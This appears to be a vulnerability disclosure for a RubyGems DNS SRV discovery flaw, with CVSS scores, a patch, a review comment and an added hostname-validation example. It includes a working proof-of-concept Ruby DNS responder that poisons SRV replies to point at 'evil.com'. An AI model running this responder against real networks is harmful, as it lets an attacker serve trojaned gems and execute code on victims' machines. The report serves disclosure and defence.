CVSS3: 8.1 High
  Attack Vector: NETWORK
  Attack Complexity: HIGH
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 6.8 Medium
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS: 0.011 Low
  Percentile: 82.4%
Description:
The RubyGems client supports a gem server API discovery function, used when
pushing gems to or pulling gems from a gem distribution/hosting server such as
RubyGems.org. This functionality is provided via a DNS SRV request for the
user's gem source hostname prefixed with "_rubygems._tcp.". The response to
this request tells the RubyGems client (the gem command) where the user's gem
server API is. In the default RubyGems scenario, with a gem source of
https://rubygems.org, the user's SRV DNS request and reply look like this:

    ~ $ dig srv _rubygems._tcp.rubygems.org +short
    0 1 80 api.rubygems.org.

Due to a deficiency in DNS response verification, an attacker positioned as a
man-in-the-middle can poison the response to this record and force the client
to unknowingly download and install Ruby gems from an attacker-controlled gem
server in a different security domain. Such a scenario would look like this:

    ~ $ dig _rubygems._tcp.rubygems.org SRV +short
    0 0 53 evil.com/api.rubygems.com.

In such a scenario the attacker can serve the client malicious gem content,
resulting in trivial remote code execution. For example, the attacker could
simply modify the gem source code and trigger code execution via the
extensions API at install time on the client machine (a gem trojaning
technique described by Ben Smith in his "Hacking with Gems" presentation at
Aloha Ruby Conference in 2012: https://www.youtube.com/watch?v=z-5bO0Q1J9s).

This vulnerability has the same net effect/impact as CVE-2015-3900 and
CVE-2015-4020.
Affected method in Gem::RemoteFetcher:
PoC DNS SRV Responder:
#!/usr/bin/env ruby
require 'rubydns'
require 'rubydns/system'

# Listen on UDP and TCP port 53 on all interfaces.
INTERFACES = [
  [:udp, "0.0.0.0", 53],
  [:tcp, "0.0.0.0", 53]
]

Name = Resolv::DNS::Name
IN = Resolv::DNS::Resource::IN

# Answer every SRV query with the same fixed record (priority 0, weight 0,
# port 53, target "evil.com/api.rubygems.com"), reproducing the poisoned reply
# shown in the description.
RubyDNS::run_server(:listen => INTERFACES) do
  match(//, IN::SRV) do |transaction|
    transaction.respond!(0, 0, 53, "evil.com/api.rubygems.com")
  end
end
Recommendations:
Consider this small patch to address the immediate attack vector…
- if /\.#{Regexp.quote(host)}\z/ =~ target
+ if (/\.#{Regexp.quote(host)}\z/ =~ target) && !target.include?("/")
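Review bot: The added `!target.include?("/")` guard rejects the PoC target but is a denylist on a single character; since an SRV target is a hostname, the stronger check is to require `target` to be a well-formed hostname (letters, digits, `-` and `.` only) before applying the `/\.#{Regexp.quote(host)}\z/` suffix match, which covers any other non-hostname character a crafted response could carry. The suffix regex also remains the only ownership test, so any subdomain of the source host is still accepted; that is consistent with the report's own point that the durable fix is to stop discovering the API over unauthenticated DNS.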
Also, consider moving away from doing API discovery via DNS. Would recommend
moving to HTTPS, where you will have a stronger transport security chain.
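As an added example (not the report's code and not RubyGems' own), the following Ruby check accepts an SRV target only when it is a well-formed hostname and is the source host or one of its subdomains, then uses it for API discovery with a fallback to the source host; StubResolver, valid_hostname?, trusted_srv_target?, discover_api_host and the sample records are all constructed here so it runs offline.

```ruby
# Added example (not RubyGems' own code): validate the _rubygems._tcp SRV target
# before trusting it as the gem API host. Combines the report's suffix check
# with a hostname well-formedness check.
require 'resolv'
HOSTNAME_LABEL = /\A[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\z/i

# A syntactically valid DNS hostname: dot-separated labels of letters, digits and
# hyphens only. Anything else (a "/", a space, an empty label) is rejected.
def valid_hostname?(name)
  return false if name.empty? || name.length > 253
  name.split('.', -1).all? { |label| HOSTNAME_LABEL.match?(label) }
end

# The suffix check from the report: target is the source host or a subdomain of it.
def in_source_domain?(target, host)
  target == host || /\.#{Regexp.quote(host)}\z/.match?(target)
end

# Normalise (strip the trailing root dot, lower-case) and require both checks.
def trusted_srv_target?(target, host)
  t = target.to_s.chomp('.').downcase
  h = host.to_s.chomp('.').downcase
  valid_hostname?(t) && in_source_domain?(t, h)
end

# Stand-in for Resolv::DNS so the example runs offline: answers with fixed records.
StubResolver = Struct.new(:records) do
  def getresources(_name, _type)
    records
  end
end

# Query _rubygems._tcp.<host>, return the first trusted target in priority order,
# and fall back to the source host itself when no record passes.
def discover_api_host(host, resolver: Resolv::DNS.new)
  srv = Resolv::DNS::Resource::IN::SRV
  records = resolver.getresources("_rubygems._tcp.#{host}", srv)
  records.sort_by { |r| [r.priority, -r.weight] }.each do |r|
    return r.target.to_s if trusted_srv_target?(r.target.to_s, host)
  end
  host
end

if __FILE__ == $PROGRAM_NAME
  srv = Resolv::DNS::Resource::IN::SRV   # constructed sample answers below
  good = StubResolver.new([srv.new(0, 1, 80, 'api.rubygems.org')])
  bad  = StubResolver.new([srv.new(0, 0, 53, 'evil.example/api.rubygems.org')])
  puts discover_api_host('rubygems.org', resolver: good)  # api.rubygems.org
  puts discover_api_host('rubygems.org', resolver: bad)   # rubygems.org
end
```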
References (these are not new, just references to prior work to help the triage team understand the impact):